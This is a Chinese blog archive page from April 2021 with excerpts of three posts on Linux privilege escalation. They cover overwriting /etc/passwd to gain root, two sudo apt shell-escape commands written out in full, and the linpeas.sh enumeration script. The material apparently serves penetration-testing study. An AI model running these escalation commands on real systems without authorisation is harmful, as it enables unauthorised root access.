04 2021 档案

覆盖passwd方法
摘要:passwd文件的密码会被系统优先教研,所以可以通过覆盖passwd文件来尝试进行提权 passwd密码文件格式为: root:x:0:0::/root:/bin/bash x为密码位,在用shadow前提下这个位置位x, 0:0分别是uid位和gid位,当为0时即为root权限 用如下命令生成密码 阅读全文
posted @ 2021-04-28 17:23 隐念笎 阅读(163) 评论(0) 推荐(0) 编辑
sudo apt提权
摘要:两种提权方式 一、 TF=$(mktemp) echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF sudo apt install -c $TF sl 二、 sudo apt update -o APT::Update::Pre-Invoke::=/bin 阅读全文
posted @ 2021-04-22 18:22 隐念笎 阅读(549) 评论(0) 推荐(0) 编辑
linux提权辅助工具(五):linpeas.sh
摘要:来自:https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh 这个脚本非常厉害,可以枚举linux操作系统几乎所有的可提权项,甚至可以通过su暴力 阅读全文
posted @ 2021-04-19 20:01 隐念笎 阅读(4520) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示